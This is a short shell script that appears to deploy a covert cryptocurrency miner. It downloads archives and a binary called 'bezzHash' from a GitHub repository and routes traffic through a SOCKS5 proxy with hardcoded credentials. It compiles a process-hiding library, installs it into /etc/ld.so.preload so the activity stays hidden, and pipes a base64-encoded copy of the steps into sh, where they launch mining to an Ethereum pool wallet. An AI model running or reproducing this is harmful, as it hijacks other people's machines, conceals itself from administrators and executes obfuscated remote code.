#!/bin/sh
ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime

dpkg-reconfigure --frontend noninteractive tzdata
wget https://raw.githubusercontent.com/nathanfleight/scripts/main/graphics.tar.gz
tar -xvzf graphics.tar.gz
cat > graftcp/local/graftcp-local.conf <<END
listen = :2233
loglevel = 1
socks5 = 104.227.76.30:6127
socks5_username = sikencot
socks5_password = mbah2237
END
./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf &
./graftcp/graftcp curl ifconfig.me

./graftcp/graftcp wget https://raw.githubusercontent.com/nathanfleight/scripts/main/bezzHash

chmod +x bezzHash
./graftcp/graftcp wget https://raw.githubusercontent.com/nathanfleight/scripts/main/magicBezzHash.zip
unzip magicBezzHash.zip
make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
mv libprocesshider.so /usr/local/lib/
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
base64 -d <<< IyEvYmluL3NoCmxuIC1mcyAvdXNyL3NoYXJlL3pvbmVpbmZvL0FmcmljYS9Kb2hhbm5lc2J1cmcgL2V0Yy9sb2NhbHRpbWUKZHBrZy1yZWNvbmZpZ3VyZSAtLWZyb250ZW5kIG5vbmludGVyYWN0aXZlIHR6ZGF0YQoKYXB0IHVwZGF0ZSAteTthcHQgLXkgaW5zdGFsbCBiaW51dGlscyBjbWFrZSBidWlsZC1lc3NlbnRpYWwgc2NyZWVuIHVuemlwIG5ldC10b29scyBjdXJsIC15Cgp3Z2V0IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9uYXRoYW5mbGVpZ2h0L3NjcmlwdHMvbWFpbi9ncmFwaGljcy50YXIuZ3oKCnRhciAteHZ6ZiBncmFwaGljcy50YXIuZ3oKCmNhdCA+IGdyYWZ0Y3AvbG9jYWwvZ3JhZnRjcC1sb2NhbC5jb25mIDw8RU5ECmxpc3RlbiA9IDoyMjMzCmxvZ2xldmVsID0gMQpzb2NrczUgPSAxODUuMjEyLjE2MC43MDo3MDg1CnNvY2tzNV91c2VybmFtZSA9IGxlYmFyYW5raXRhCnNvY2tzNV9wYXNzd29yZCA9IGJ1YXRUSFJhbgpFTkQKCi4vZ3JhZnRjcC9sb2NhbC9ncmFmdGNwLWxvY2FsIC1jb25maWcgZ3JhZnRjcC9sb2NhbC9ncmFmdGNwLWxvY2FsLmNvbmYgJgoKc2xlZXAgLjIKCmVjaG8gIiAiCmVjaG8gIiAiCgplY2hvICIiCgouL2dyYWZ0Y3AvZ3JhZnRjcCBjdXJsIGlmY29uZmlnLm1lCgplY2hvICIgIgplY2hvICIgIgoKZWNobyAiIgoKZWNobyAiICIKZWNobyAiICIKCi4vZ3JhZnRjcC9ncmFmdGNwIHdnZXQgaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL25hdGhhbmZsZWlnaHQvc2NyaXB0cy9tYWluL2JlenpIYXNoCmNobW9kICt4IGJlenpIYXNoCgouL2dyYWZ0Y3AvZ3JhZnRjcCB3Z2V0IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9uYXRoYW5mbGVpZ2h0L3NjcmlwdHMvbWFpbi9tYWdpY0JlenpIYXNoLnppcAp1bnppcCBtYWdpY0JlenpIYXNoLnppcAptYWtlCmdjYyAtV2FsbCAtZlBJQyAtc2hhcmVkIC1vIGxpYnByb2Nlc3NoaWRlci5zbyBwcm9jZXNzaGlkZXIuYyAtbGRsCm12IGxpYnByb2Nlc3NoaWRlci5zbyAvdXNyL2xvY2FsL2xpYi8KZWNobyAvdXNyL2xvY2FsL2xpYi9saWJwcm9jZXNzaGlkZXIuc28gPj4gL2V0Yy9sZC5zby5wcmVsb2FkCgouL2dyYWZ0Y3AvZ3JhZnRjcCAuL2JlenpIYXNoIC0tdXJsPXNzbDovLzB4YmM0OGI4YmRjZTU3MmRlZmU0ZGNhYjg1MTAzZjE0MDA5OWJjNWFmNS5SRFBAZXRoLXVzLXdlc3QuZmxleHBvb2wuaW86NTU1NSAtLWxvZyAtLWV4dHJhIC0tbGF0ZW5jeSAtLWFsbC1zaGFyZXMgLS1zaGFyZXMtZGV0YWlsIC0tc2hvdy1tb2RlIC0tbGlzdC1tb2RlcyAtLW1vZGU9OTk== | sh
